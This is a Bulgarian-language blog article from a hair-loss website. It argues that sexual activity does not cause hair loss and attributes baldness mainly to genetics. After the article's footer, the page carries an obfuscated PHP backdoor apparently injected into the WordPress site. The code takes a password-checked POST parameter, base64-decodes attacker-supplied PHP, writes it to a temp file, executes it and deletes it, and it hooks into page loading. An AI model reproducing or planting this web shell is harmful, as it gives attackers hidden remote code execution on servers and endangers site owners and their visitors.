Косопад и секс | Косопад

Редовният секс причина за косопад?

За връзката между косопад и секс

косопад и секс

Секс и косопад

По света има купища теории за косопада и сексуалната активност. Консервативно настроените застават зад тезата, че честото отдаване на плътски страсти е пагубно за тялото. В научните среди обаче са категорични, че ако редовният секс води до загуба на коса, то тогава всички на планетата трябва да бъдат плешиви.

Все пак има ли връзка между косопад и секс?

Съгласно една от основните теории за сексуалната активност, твърде честото отдаване на плътски страсти и последващото отделяне на течности водят до дефицит на протеин в тялото, което предизвиква косопад.

При мъжете семенната течност се състои от около 90 % вода и 10 % протеин, който е отговорен за растежа и възстановяването на много от телесните тъкани, включително и на косата. Тъй като косъмът е влакнест протеин това води до мисълта, че изчерпаните нива на белтъчините се отразяват пагубно върху растежа и предизвикват плешивост.

Специалистите са категорични, че въпреки този факт, сам по себе си сексът не може да предизвика косопад. Дори и прекомерното експулсиране на семенна течност не е в състояние да намали общите нива на протеин, тъй като косата на здравия човек при всички положения получава достатъчно количество е важните за нея съставки. Ако все пак съществуват някакви съмнения, достатъчно е да си организирате здравословно хранене, което да подсигури всички важни елементи за човешкото тяло.

Според друга популярна теория за връзката между секс и косопад, еротичните преживявания водят до оплешивяване, тъй като увеличават нивата на тестостерон. Това от своя страна предизвиква свръхпроизводство на дихидротестостерон, който е пряко отговорен за окапване на косата. И тук учените са категорични, че подобна хипотеза не може да се взема сериозно, защото високите нива на тестостерон в тялото не са коренът на проблема.

В подобни случаи на оплешивяване, основна роля играе генетиката и ако човек е предразположен към косопад по наследство, то неговите космени фоликули са по – чувствителни към нежеланите реакции на дихидротестостерона, свиват се и причиняват загуба на коса.

В крайна сметка смело можем да направим извода, че няма пряка връзка между косопад и секс. Дори да страдате от оплешивяване, това не се дължи на вашия сексуален живот и в никакъв случай не трябва да се ограничавате. Принудителното въздържание и умишленото възпиране поривите на природата може да доведе до сериозни проблеми в психиката и тялото както на мъжа, така и на жената.

секс и косопад

Сексът не причинява косопад

14. април 2013 11:19:52 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}